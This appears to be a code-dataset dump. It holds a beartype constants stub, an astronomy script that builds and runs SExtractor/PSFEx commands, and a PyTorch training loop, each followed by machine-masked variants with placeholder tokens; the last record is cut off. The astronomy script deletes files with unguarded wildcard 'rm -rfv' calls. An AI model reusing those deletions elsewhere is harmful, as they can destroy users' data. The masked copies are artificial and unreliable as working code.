#!/usr/bin/env python3 # --------------------( LICENSE )-------------------- # Copyright (c) 2014-2023 Beartype authors. # See "LICENSE" for further details. ''' Project-wide **standard Python module globals** (i.e., global constants describing modules and packages bundled with CPython's standard library). This private submodule is *not* intended for importation by downstream callers. ''' # ....................{ IMPORTS }.................... # ....................{ NAMES }.................... BUILTINS_MODULE_NAME = 'builtins' ''' Fully-qualified name of the **builtins module** (i.e., objects defined by the standard :mod:`builtins` module and thus globally available by default *without* requiring explicit importation). '''
[ "#!/usr/bin/env python3\n# --------------------( LICENSE )--------------------\n# Copyright (c) 2014-2023 Beartype authors.\n# See \"LICENSE\" for further details.\n\n'''\nProject-wide **standard Python module globals** (i.e., global constants\ndescribing modules and packages bundled with CPython's standard library).\n\nThis private submodule is *not* intended for importation by downstream callers.\n'''\n\n# ....................{ IMPORTS }....................\n\n# ....................{ NAMES }....................\nBUILTINS_MODULE_NAME = 'builtins'\n'''\nFully-qualified name of the **builtins module** (i.e., objects defined by the\nstandard :mod:`builtins` module and thus globally available by default\n*without* requiring explicit importation).\n'''\n", "<docstring token>\nBUILTINS_MODULE_NAME = 'builtins'\n<docstring token>\n", "<docstring token>\n<assignment token>\n<docstring token>\n" ]
false
90
c23125018a77508dad6fd2cb86ec6d556fbd1019
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Thu May 21 11:40:26 2020 @author: jlee """ import time start_time = time.time() import numpy as np import glob, os from astropy.io import fits import init_cfg as ic # ----- Making scripts for PSFEx ----- # os.system("psfex -dd > config.psfex") if ic.use_backsub: prefix = 'b' else: prefix = '' f = open('psfex_all.sh','w') f.write('\n') f.write('#############################'+'\n') f.write('##### Scripts for PSFEx #####'+'\n') f.write('#############################'+'\n') f.write('\n') for i in np.arange(len(ic.fields)): f.write('# ----- HSC field : '+ic.fields[i]+' ----- #'+'\n') f.write('\n') for j in np.arange(len(ic.filters)): flt = ic.filters[j].split('-')[1] f.write('rm -rfv prepsfex_'+flt+'.cat\n') f.write('sex Images/'+prefix+ic.fields[i]+'-'+flt+'.fits -c prepsfex.sex -CATALOG_NAME prepsfex_'+flt+'.cat ') f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(ic.THRES_psf)) f.write(f"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n") f.write('sex Images/'+prefix+ic.fields[i]+'-'+flt+'.fits -c prepsfex.sex -CATALOG_NAME prepsfex_'+ic.fields[i]+'-'+flt+'.cat -CATALOG_TYPE ASCII_HEAD ') f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(ic.THRES_psf)) f.write(f"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n") f.write('psfex prepsfex_'+flt+'.cat -c config.psfex ') f.write(f"-SAMPLE_FWHMRANGE {ic.FWHMR_psf[0]:.1f},{ic.FWHMR_psf[1]:.1f} ") f.write(f"-SAMPLE_MINSN {ic.MINSN_psf:.1f} -SAMPLE_MAXELLIP {ic.MAXEL_psf:.2f} ") f.write('-OUTCAT_TYPE ASCII_HEAD -OUTCAT_NAME psf_'+ic.fields[i]+'-'+flt+'.cat ') f.write('-CHECKPLOT_TYPE NONE -XML_NAME psf_'+ic.fields[i]+'-'+flt+'.xml\n') f.write('mv -v prepsfex_'+flt+'.psf psf_'+ic.fields[i]+'-'+flt+'.psf\n') f.write('\n') f.write('\n\n') f.close() # ----- Running scripts for PSFEx ----- # if (glob.glob("PSFEx/") == []): os.system("mkdir PSFEx") else: os.system("rm -rfv PSFEx/*") os.system("sh psfex_all.sh") os.system("mv -v psf_*.cat psf_*.xml psf_*.psf PSFEx/") os.system("mv -v prepsfex_*-*.cat PSFEx/") os.system("rm -rfv ./*.fits prepsfex_*.cat") # Printing the running time print("--- %s seconds ---" % (time.time() - start_time))
[ "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 21 11:40:26 2020\n\n@author: jlee\n\"\"\"\n\n\nimport time\nstart_time = time.time()\n\nimport numpy as np\nimport glob, os\nfrom astropy.io import fits\n\nimport init_cfg as ic\n\n\n# ----- Making scripts for PSFEx ----- #\nos.system(\"psfex -dd > config.psfex\")\n\nif ic.use_backsub:\n\tprefix = 'b'\nelse:\n\tprefix = ''\n\nf = open('psfex_all.sh','w')\nf.write('\\n')\nf.write('#############################'+'\\n')\nf.write('##### Scripts for PSFEx #####'+'\\n')\nf.write('#############################'+'\\n')\nf.write('\\n')\nfor i in np.arange(len(ic.fields)):\n\tf.write('# ----- HSC field : '+ic.fields[i]+' ----- #'+'\\n')\n\tf.write('\\n')\n\tfor j in np.arange(len(ic.filters)):\n\t\tflt = ic.filters[j].split('-')[1]\n\t\tf.write('rm -rfv prepsfex_'+flt+'.cat\\n')\n\t\tf.write('sex Images/'+prefix+ic.fields[i]+'-'+flt+'.fits -c prepsfex.sex -CATALOG_NAME prepsfex_'+flt+'.cat ')\n\t\tf.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(ic.THRES_psf))\n\t\tf.write(f\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\\n\")\n\t\tf.write('sex Images/'+prefix+ic.fields[i]+'-'+flt+'.fits -c prepsfex.sex -CATALOG_NAME prepsfex_'+ic.fields[i]+'-'+flt+'.cat -CATALOG_TYPE ASCII_HEAD ')\n\t\tf.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(ic.THRES_psf))\n\t\tf.write(f\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\\n\")\n\t\tf.write('psfex prepsfex_'+flt+'.cat -c config.psfex ')\n\t\tf.write(f\"-SAMPLE_FWHMRANGE {ic.FWHMR_psf[0]:.1f},{ic.FWHMR_psf[1]:.1f} \")\n\t\tf.write(f\"-SAMPLE_MINSN {ic.MINSN_psf:.1f} -SAMPLE_MAXELLIP {ic.MAXEL_psf:.2f} \")\n\t\tf.write('-OUTCAT_TYPE ASCII_HEAD -OUTCAT_NAME psf_'+ic.fields[i]+'-'+flt+'.cat ')\n\t\tf.write('-CHECKPLOT_TYPE NONE -XML_NAME psf_'+ic.fields[i]+'-'+flt+'.xml\\n')\n\t\tf.write('mv -v prepsfex_'+flt+'.psf psf_'+ic.fields[i]+'-'+flt+'.psf\\n')\n\t\tf.write('\\n')\n\tf.write('\\n\\n')\nf.close()\n\n\n# ----- Running scripts for PSFEx ----- #\nif (glob.glob(\"PSFEx/\") == []):\n\tos.system(\"mkdir PSFEx\")\nelse:\n\tos.system(\"rm -rfv PSFEx/*\")\n\nos.system(\"sh psfex_all.sh\")\n\nos.system(\"mv -v psf_*.cat psf_*.xml psf_*.psf PSFEx/\")\nos.system(\"mv -v prepsfex_*-*.cat PSFEx/\")\nos.system(\"rm -rfv ./*.fits prepsfex_*.cat\")\n\n\n# Printing the running time \nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n", "<docstring token>\nimport time\nstart_time = time.time()\nimport numpy as np\nimport glob, os\nfrom astropy.io import fits\nimport init_cfg as ic\nos.system('psfex -dd > config.psfex')\nif ic.use_backsub:\n prefix = 'b'\nelse:\n prefix = ''\nf = open('psfex_all.sh', 'w')\nf.write('\\n')\nf.write('#############################' + '\\n')\nf.write('##### Scripts for PSFEx #####' + '\\n')\nf.write('#############################' + '\\n')\nf.write('\\n')\nfor i in np.arange(len(ic.fields)):\n f.write('# ----- HSC field : ' + ic.fields[i] + ' ----- #' + '\\n')\n f.write('\\n')\n for j in np.arange(len(ic.filters)):\n flt = ic.filters[j].split('-')[1]\n f.write('rm -rfv prepsfex_' + flt + '.cat\\n')\n f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +\n '.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + flt + '.cat ')\n f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(\n ic.THRES_psf))\n f.write(\n f\"\"\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n\"\"\"\n )\n f.write('sex Images/' + 
prefix + ic.fields[i] + '-' + flt +\n '.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + ic.fields[i] +\n '-' + flt + '.cat -CATALOG_TYPE ASCII_HEAD ')\n f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(\n ic.THRES_psf))\n f.write(\n f\"\"\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n\"\"\"\n )\n f.write('psfex prepsfex_' + flt + '.cat -c config.psfex ')\n f.write(\n f'-SAMPLE_FWHMRANGE {ic.FWHMR_psf[0]:.1f},{ic.FWHMR_psf[1]:.1f} ')\n f.write(\n f'-SAMPLE_MINSN {ic.MINSN_psf:.1f} -SAMPLE_MAXELLIP {ic.MAXEL_psf:.2f} '\n )\n f.write('-OUTCAT_TYPE ASCII_HEAD -OUTCAT_NAME psf_' + ic.fields[i] +\n '-' + flt + '.cat ')\n f.write('-CHECKPLOT_TYPE NONE -XML_NAME psf_' + ic.fields[i] + '-' +\n flt + '.xml\\n')\n f.write('mv -v prepsfex_' + flt + '.psf psf_' + ic.fields[i] + '-' +\n flt + '.psf\\n')\n f.write('\\n')\n f.write('\\n\\n')\nf.close()\nif glob.glob('PSFEx/') == []:\n os.system('mkdir PSFEx')\nelse:\n os.system('rm -rfv PSFEx/*')\nos.system('sh psfex_all.sh')\nos.system('mv -v psf_*.cat psf_*.xml psf_*.psf PSFEx/')\nos.system('mv -v prepsfex_*-*.cat PSFEx/')\nos.system('rm -rfv ./*.fits prepsfex_*.cat')\nprint('--- %s seconds ---' % (time.time() - start_time))\n", "<docstring token>\n<import token>\nstart_time = time.time()\n<import token>\nos.system('psfex -dd > config.psfex')\nif ic.use_backsub:\n prefix = 'b'\nelse:\n prefix = ''\nf = open('psfex_all.sh', 'w')\nf.write('\\n')\nf.write('#############################' + '\\n')\nf.write('##### Scripts for PSFEx #####' + '\\n')\nf.write('#############################' + '\\n')\nf.write('\\n')\nfor i in np.arange(len(ic.fields)):\n f.write('# ----- HSC field : ' + ic.fields[i] + ' ----- #' + '\\n')\n f.write('\\n')\n for j in np.arange(len(ic.filters)):\n flt = ic.filters[j].split('-')[1]\n f.write('rm -rfv prepsfex_' + flt + '.cat\\n')\n f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +\n '.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + flt + '.cat ')\n f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(\n ic.THRES_psf))\n f.write(\n f\"\"\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n\"\"\"\n )\n f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +\n '.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + ic.fields[i] +\n '-' + flt + '.cat -CATALOG_TYPE ASCII_HEAD ')\n f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(\n ic.THRES_psf))\n f.write(\n f\"\"\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n\"\"\"\n )\n f.write('psfex prepsfex_' + flt + '.cat -c config.psfex ')\n f.write(\n f'-SAMPLE_FWHMRANGE {ic.FWHMR_psf[0]:.1f},{ic.FWHMR_psf[1]:.1f} ')\n f.write(\n f'-SAMPLE_MINSN {ic.MINSN_psf:.1f} -SAMPLE_MAXELLIP {ic.MAXEL_psf:.2f} '\n )\n f.write('-OUTCAT_TYPE ASCII_HEAD -OUTCAT_NAME psf_' + ic.fields[i] +\n '-' + flt + '.cat ')\n f.write('-CHECKPLOT_TYPE NONE -XML_NAME psf_' + ic.fields[i] + '-' +\n flt + '.xml\\n')\n f.write('mv -v prepsfex_' + flt + '.psf psf_' + ic.fields[i] + '-' +\n flt + '.psf\\n')\n f.write('\\n')\n f.write('\\n\\n')\nf.close()\nif glob.glob('PSFEx/') == []:\n os.system('mkdir PSFEx')\nelse:\n os.system('rm -rfv PSFEx/*')\nos.system('sh psfex_all.sh')\nos.system('mv -v psf_*.cat psf_*.xml psf_*.psf PSFEx/')\nos.system('mv -v prepsfex_*-*.cat PSFEx/')\nos.system('rm -rfv ./*.fits prepsfex_*.cat')\nprint('--- %s seconds ---' % (time.time() - start_time))\n", "<docstring token>\n<import token>\n<assignment token>\n<import 
token>\nos.system('psfex -dd > config.psfex')\nif ic.use_backsub:\n prefix = 'b'\nelse:\n prefix = ''\n<assignment token>\nf.write('\\n')\nf.write('#############################' + '\\n')\nf.write('##### Scripts for PSFEx #####' + '\\n')\nf.write('#############################' + '\\n')\nf.write('\\n')\nfor i in np.arange(len(ic.fields)):\n f.write('# ----- HSC field : ' + ic.fields[i] + ' ----- #' + '\\n')\n f.write('\\n')\n for j in np.arange(len(ic.filters)):\n flt = ic.filters[j].split('-')[1]\n f.write('rm -rfv prepsfex_' + flt + '.cat\\n')\n f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +\n '.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + flt + '.cat ')\n f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(\n ic.THRES_psf))\n f.write(\n f\"\"\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n\"\"\"\n )\n f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +\n '.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + ic.fields[i] +\n '-' + flt + '.cat -CATALOG_TYPE ASCII_HEAD ')\n f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(\n ic.THRES_psf))\n f.write(\n f\"\"\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n\"\"\"\n )\n f.write('psfex prepsfex_' + flt + '.cat -c config.psfex ')\n f.write(\n f'-SAMPLE_FWHMRANGE {ic.FWHMR_psf[0]:.1f},{ic.FWHMR_psf[1]:.1f} ')\n f.write(\n f'-SAMPLE_MINSN {ic.MINSN_psf:.1f} -SAMPLE_MAXELLIP {ic.MAXEL_psf:.2f} '\n )\n f.write('-OUTCAT_TYPE ASCII_HEAD -OUTCAT_NAME psf_' + ic.fields[i] +\n '-' + flt + '.cat ')\n f.write('-CHECKPLOT_TYPE NONE -XML_NAME psf_' + ic.fields[i] + '-' +\n flt + '.xml\\n')\n f.write('mv -v prepsfex_' + flt + '.psf psf_' + ic.fields[i] + '-' +\n flt + '.psf\\n')\n f.write('\\n')\n f.write('\\n\\n')\nf.close()\nif glob.glob('PSFEx/') == []:\n os.system('mkdir PSFEx')\nelse:\n os.system('rm -rfv PSFEx/*')\nos.system('sh psfex_all.sh')\nos.system('mv -v psf_*.cat psf_*.xml psf_*.psf PSFEx/')\nos.system('mv -v prepsfex_*-*.cat PSFEx/')\nos.system('rm -rfv ./*.fits prepsfex_*.cat')\nprint('--- %s seconds ---' % (time.time() - start_time))\n", "<docstring token>\n<import token>\n<assignment token>\n<import token>\n<code token>\n<assignment token>\n<code token>\n" ]
false
91
81688d51696156905736b5de7a4929387fd385ab
import argparse import datetime import importlib import pprint import time import random import numpy as np import torch from torch.utils.tensorboard import SummaryWriter from utils import get_git_state, time_print, AverageMeter, ProgressMeter, save_checkpoint def train(cfg, epoch, data_loader, model): data_time = AverageMeter("Data", ":6.3f") batch_time = AverageMeter("Time", ":6.3f") losses = AverageMeter("Loss", ":.4e") progress = ProgressMeter( len(data_loader)-1, [batch_time, data_time, losses], prefix=f"Epoch: [{epoch}]\t") model.train() end = time.time() for batch_nb, batch in enumerate(data_loader): d_time = time.time() - end data_time.update(d_time) global_step = model.global_step writer.add_scalar("time/data/train", d_time, global_step) report = model.training_step(batch, batch_nb) losses.update(report["loss"]) for k, v in report.items(): writer.add_scalar(f"{k}/train", v, global_step) b_time = time.time() - end batch_time.update(b_time) writer.add_scalar("time/batch/train", b_time, global_step) end = time.time() if batch_nb % cfg.log.freq == 0 or batch_nb == len(data_loader) - 1: progress.display(batch_nb, print_fn=lambda *x: time_print(*x, end="\r")) def test(cfg, data_loader, model): data_time = AverageMeter("Data", ":6.3f") batch_time = AverageMeter("Time", ":6.3f") losses = AverageMeter("Loss", ":.4e") metrics = ["performance"] metrics = {m: AverageMeter(m, ":.4e") for m in metrics} progress = ProgressMeter( len(data_loader)-1, [batch_time, data_time, losses, *metrics.values()], prefix="Test:\t") model.eval() global_step = model.global_step end = time.time() for batch_nb, batch in enumerate(data_loader): data_time.update(time.time() - end) with torch.no_grad(): report = model.test_step(batch, batch_nb) losses.update(report["loss"]) for k, v in report.items(): if k not in metrics: metrics[k] = AverageMeter(k, ":.3f") metrics[k].update(v) batch_time.update(time.time() - end) end = time.time() if batch_nb % cfg.log.freq == 0 or batch_nb == len(data_loader) - 1: progress.display(batch_nb, print_fn=lambda *x: time_print(*x, end="\r")) writer.add_scalar("loss/test", losses.avg, global_step) writer.add_scalar("time/batch/test", batch_time.avg, global_step) writer.add_scalar("time/data/test", data_time.avg, global_step) for k,v in metrics.items(): writer.add_scalar(f"{k}/test", v.avg, global_step) progress.display(len(data_loader) - 1, time_print) def main(cfg, pool=None): model = importlib.import_module(f"models.{cfg.model}").Model(cfg, pool=pool) if getattr(cfg, "load_model", False): model.load_ckpt() if model.device != "cpu" and torch.cuda.device_count() > 1: model = torch.nn.DataParallel(model) model = model.to(model.device) train_loader = model.get_train_loader() test_loader = model.get_test_loader() for epoch in range(cfg.num_epoch): time_print(f"\nEpoch {epoch} Training") train(cfg, epoch, train_loader, model) filename = "checkpoint.pth.tar" if not getattr(cfg.log, "overwrite_ckpt", True): filename = "_".join([str(epoch), filename]) save_checkpoint( state={ "epoch": epoch, "global_step": model.global_step, "state_dict": model.state_dict(), "opt_state_dict": {k: v.state_dict() for k,v in model.optimizers.items()}, "cfg": cfg, }, directory=cfg.log.misc_dir, filename=filename) time_print("\nTest") test(cfg, test_loader, model) if __name__ == "__main__": parser = argparse.ArgumentParser(description="Run script") parser.add_argument("--config", "-c",type=str, required=False, default="config") args = parser.parse_args() git_state = get_git_state() config = 
importlib.import_module(f"configs.{args.config}").config config.log.exp_id = git_state[1][:7] + datetime.datetime.now().strftime("%Y-%m-%d_%H:%M:%S") config.log.misc_dir = config.log.dir / "misc" / config.log.exp_id config.log.tb_dir = config.log.dir / "tb" / config.log.exp_id config.log.misc_dir.mkdir(exist_ok=True, parents=True) config.log.tb_dir.mkdir(exist_ok=True, parents=True) torch.manual_seed(config.rnd_seed) np.random.seed(config.rnd_seed) random.seed(config.rnd_seed) if getattr(config, "anomaly_detection", False): torch.autograd.set_detect_anomaly(True) global writer writer = SummaryWriter( log_dir=config.log.tb_dir, comment=f"{config.description}, {git_state}") time_print(pprint.pformat(config)) time_print(f"Git head at state: {git_state}") try: if npp:=getattr(config, "n_process_pool", 0): with torch.multiprocessing.Pool(npp) as pool: main(config, pool=pool) else: main(config) except KeyboardInterrupt: time_print(f"Keyboard interrupt") exit(0)
[ "import argparse\nimport datetime\nimport importlib\nimport pprint\nimport time\nimport random\n\nimport numpy as np\nimport torch\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom utils import get_git_state, time_print, AverageMeter, ProgressMeter, save_checkpoint\n\n\ndef train(cfg, epoch, data_loader, model):\n data_time = AverageMeter(\"Data\", \":6.3f\")\n batch_time = AverageMeter(\"Time\", \":6.3f\")\n losses = AverageMeter(\"Loss\", \":.4e\")\n \n progress = ProgressMeter(\n len(data_loader)-1,\n [batch_time, data_time, losses],\n prefix=f\"Epoch: [{epoch}]\\t\")\n\n model.train()\n\n end = time.time()\n for batch_nb, batch in enumerate(data_loader):\n d_time = time.time() - end\n data_time.update(d_time)\n\n global_step = model.global_step\n writer.add_scalar(\"time/data/train\", d_time, global_step)\n\n report = model.training_step(batch, batch_nb)\n\n losses.update(report[\"loss\"])\n\n for k, v in report.items():\n writer.add_scalar(f\"{k}/train\", v, global_step)\n\n b_time = time.time() - end\n batch_time.update(b_time)\n writer.add_scalar(\"time/batch/train\", b_time, global_step)\n end = time.time()\n\n if batch_nb % cfg.log.freq == 0 or batch_nb == len(data_loader) - 1:\n progress.display(batch_nb, print_fn=lambda *x: time_print(*x, end=\"\\r\"))\n\ndef test(cfg, data_loader, model):\n data_time = AverageMeter(\"Data\", \":6.3f\")\n batch_time = AverageMeter(\"Time\", \":6.3f\")\n losses = AverageMeter(\"Loss\", \":.4e\")\n metrics = [\"performance\"]\n metrics = {m: AverageMeter(m, \":.4e\") for m in metrics}\n\n progress = ProgressMeter(\n len(data_loader)-1,\n [batch_time, data_time, losses, *metrics.values()],\n prefix=\"Test:\\t\")\n\n model.eval()\n\n global_step = model.global_step\n\n end = time.time()\n for batch_nb, batch in enumerate(data_loader):\n data_time.update(time.time() - end)\n with torch.no_grad():\n report = model.test_step(batch, batch_nb)\n \n losses.update(report[\"loss\"])\n\n for k, v in report.items():\n if k not in metrics:\n metrics[k] = AverageMeter(k, \":.3f\")\n metrics[k].update(v)\n \n batch_time.update(time.time() - end)\n end = time.time()\n\n if batch_nb % cfg.log.freq == 0 or batch_nb == len(data_loader) - 1:\n progress.display(batch_nb, print_fn=lambda *x: time_print(*x, end=\"\\r\"))\n\n writer.add_scalar(\"loss/test\", losses.avg, global_step)\n writer.add_scalar(\"time/batch/test\", batch_time.avg, global_step)\n writer.add_scalar(\"time/data/test\", data_time.avg, global_step)\n\n for k,v in metrics.items():\n writer.add_scalar(f\"{k}/test\", v.avg, global_step)\n\n progress.display(len(data_loader) - 1, time_print)\n\n\ndef main(cfg, pool=None):\n model = importlib.import_module(f\"models.{cfg.model}\").Model(cfg, pool=pool)\n\n if getattr(cfg, \"load_model\", False):\n model.load_ckpt()\n\n if model.device != \"cpu\" and torch.cuda.device_count() > 1:\n model = torch.nn.DataParallel(model)\n\n model = model.to(model.device)\n\n train_loader = model.get_train_loader()\n test_loader = model.get_test_loader()\n\n for epoch in range(cfg.num_epoch):\n time_print(f\"\\nEpoch {epoch} Training\")\n train(cfg, epoch, train_loader, model)\n \n filename = \"checkpoint.pth.tar\"\n if not getattr(cfg.log, \"overwrite_ckpt\", True):\n filename = \"_\".join([str(epoch), filename])\n\n save_checkpoint(\n state={\n \"epoch\": epoch,\n \"global_step\": model.global_step,\n \"state_dict\": model.state_dict(),\n \"opt_state_dict\": {k: v.state_dict() for k,v in model.optimizers.items()},\n \"cfg\": cfg,\n },\n 
directory=cfg.log.misc_dir,\n filename=filename)\n \n time_print(\"\\nTest\")\n test(cfg, test_loader, model)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Run script\")\n parser.add_argument(\"--config\", \"-c\",type=str, required=False, default=\"config\")\n args = parser.parse_args()\n git_state = get_git_state()\n config = importlib.import_module(f\"configs.{args.config}\").config\n config.log.exp_id = git_state[1][:7] + datetime.datetime.now().strftime(\"%Y-%m-%d_%H:%M:%S\")\n config.log.misc_dir = config.log.dir / \"misc\" / config.log.exp_id\n config.log.tb_dir = config.log.dir / \"tb\" / config.log.exp_id\n config.log.misc_dir.mkdir(exist_ok=True, parents=True)\n config.log.tb_dir.mkdir(exist_ok=True, parents=True)\n\n torch.manual_seed(config.rnd_seed)\n np.random.seed(config.rnd_seed)\n random.seed(config.rnd_seed)\n\n if getattr(config, \"anomaly_detection\", False):\n torch.autograd.set_detect_anomaly(True)\n\n global writer\n writer = SummaryWriter(\n log_dir=config.log.tb_dir,\n comment=f\"{config.description}, {git_state}\")\n\n time_print(pprint.pformat(config))\n time_print(f\"Git head at state: {git_state}\")\n\n try:\n if npp:=getattr(config, \"n_process_pool\", 0):\n with torch.multiprocessing.Pool(npp) as pool:\n main(config, pool=pool)\n else:\n main(config)\n except KeyboardInterrupt:\n time_print(f\"Keyboard interrupt\")\n exit(0)", "import argparse\nimport datetime\nimport importlib\nimport pprint\nimport time\nimport random\nimport numpy as np\nimport torch\nfrom torch.utils.tensorboard import SummaryWriter\nfrom utils import get_git_state, time_print, AverageMeter, ProgressMeter, save_checkpoint\n\n\ndef train(cfg, epoch, data_loader, model):\n data_time = AverageMeter('Data', ':6.3f')\n batch_time = AverageMeter('Time', ':6.3f')\n losses = AverageMeter('Loss', ':.4e')\n progress = ProgressMeter(len(data_loader) - 1, [batch_time, data_time,\n losses], prefix=f'Epoch: [{epoch}]\\t')\n model.train()\n end = time.time()\n for batch_nb, batch in enumerate(data_loader):\n d_time = time.time() - end\n data_time.update(d_time)\n global_step = model.global_step\n writer.add_scalar('time/data/train', d_time, global_step)\n report = model.training_step(batch, batch_nb)\n losses.update(report['loss'])\n for k, v in report.items():\n writer.add_scalar(f'{k}/train', v, global_step)\n b_time = time.time() - end\n batch_time.update(b_time)\n writer.add_scalar('time/batch/train', b_time, global_step)\n end = time.time()\n if batch_nb % cfg.log.freq == 0 or batch_nb == len(data_loader) - 1:\n progress.display(batch_nb, print_fn=lambda *x: time_print(*x,\n end='\\r'))\n\n\ndef test(cfg, data_loader, model):\n data_time = AverageMeter('Data', ':6.3f')\n batch_time = AverageMeter('Time', ':6.3f')\n losses = AverageMeter('Loss', ':.4e')\n metrics = ['performance']\n metrics = {m: AverageMeter(m, ':.4e') for m in metrics}\n progress = ProgressMeter(len(data_loader) - 1, [batch_time, data_time,\n losses, *metrics.values()], prefix='Test:\\t')\n model.eval()\n global_step = model.global_step\n end = time.time()\n for batch_nb, batch in enumerate(data_loader):\n data_time.update(time.time() - end)\n with torch.no_grad():\n report = model.test_step(batch, batch_nb)\n losses.update(report['loss'])\n for k, v in report.items():\n if k not in metrics:\n metrics[k] = AverageMeter(k, ':.3f')\n metrics[k].update(v)\n batch_time.update(time.time() - end)\n end = time.time()\n if batch_nb % cfg.log.freq == 0 or batch_nb == len(data_loader) - 1:\n 
progress.display(batch_nb, print_fn=lambda *x: time_print(*x,\n end='\\r'))\n writer.add_scalar('loss/test', losses.avg, global_step)\n writer.add_scalar('time/batch/test', batch_time.avg, global_step)\n writer.add_scalar('time/data/test', data_time.avg, global_step)\n for k, v in metrics.items():\n writer.add_scalar(f'{k}/test', v.avg, global_step)\n progress.display(len(data_loader) - 1, time_print)\n\n\ndef main(cfg, pool=None):\n model = importlib.import_module(f'models.{cfg.model}').Model(cfg, pool=pool\n )\n if getattr(cfg, 'load_model', False):\n model.load_ckpt()\n if model.device != 'cpu' and torch.cuda.device_count() > 1:\n model = torch.nn.DataParallel(model)\n model = model.to(model.device)\n train_loader = model.get_train_loader()\n test_loader = model.get_test_loader()\n for epoch in range(cfg.num_epoch):\n time_print(f'\\nEpoch {epoch} Training')\n train(cfg, epoch, train_loader, model)\n filename = 'checkpoint.pth.tar'\n if not getattr(cfg.log, 'overwrite_ckpt', True):\n filename = '_'.join([str(epoch), filename])\n save_checkpoint(state={'epoch': epoch, 'global_step': model.\n global_step, 'state_dict': model.state_dict(), 'opt_state_dict':\n {k: v.state_dict() for k, v in model.optimizers.items()}, 'cfg':\n cfg}, directory=cfg.log.misc_dir, filename=filename)\n time_print('\\nTest')\n test(cfg, test_loader, model)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Run script')\n parser.add_argument('--config', '-c', type=str, required=False, default\n ='config')\n args = parser.parse_args()\n git_state = get_git_state()\n config = importlib.import_module(f'configs.{args.config}').config\n config.log.exp_id = git_state[1][:7] + datetime.datetime.now().strftime(\n '%Y-%m-%d_%H:%M:%S')\n config.log.misc_dir = config.log.dir / 'misc' / config.log.exp_id\n config.log.tb_dir = config.log.dir / 'tb' / config.log.exp_id\n config.log.misc_dir.mkdir(exist_ok=True, parents=True)\n config.log.tb_dir.mkdir(exist_ok=True, parents=True)\n torch.manual_seed(config.rnd_seed)\n np.random.seed(config.rnd_seed)\n random.seed(config.rnd_seed)\n if getattr(config, 'anomaly_detection', False):\n torch.autograd.set_detect_anomaly(True)\n global writer\n writer = SummaryWriter(log_dir=config.log.tb_dir, comment=\n f'{config.description}, {git_state}')\n time_print(pprint.pformat(config))\n time_print(f'Git head at state: {git_state}')\n try:\n if (npp := getattr(config, 'n_process_pool', 0)):\n with torch.multiprocessing.Pool(npp) as pool:\n main(config, pool=pool)\n else:\n main(config)\n except KeyboardInterrupt:\n time_print(f'Keyboard interrupt')\n exit(0)\n", "<import token>\n\n\ndef train(cfg, epoch, data_loader, model):\n data_time = AverageMeter('Data', ':6.3f')\n batch_time = AverageMeter('Time', ':6.3f')\n losses = AverageMeter('Loss', ':.4e')\n progress = ProgressMeter(len(data_loader) - 1, [batch_time, data_time,\n losses], prefix=f'Epoch: [{epoch}]\\t')\n model.train()\n end = time.time()\n for batch_nb, batch in enumerate(data_loader):\n d_time = time.time() - end\n data_time.update(d_time)\n global_step = model.global_step\n writer.add_scalar('time/data/train', d_time, global_step)\n report = model.training_step(batch, batch_nb)\n losses.update(report['loss'])\n for k, v in report.items():\n writer.add_scalar(f'{k}/train', v, global_step)\n b_time = time.time() - end\n 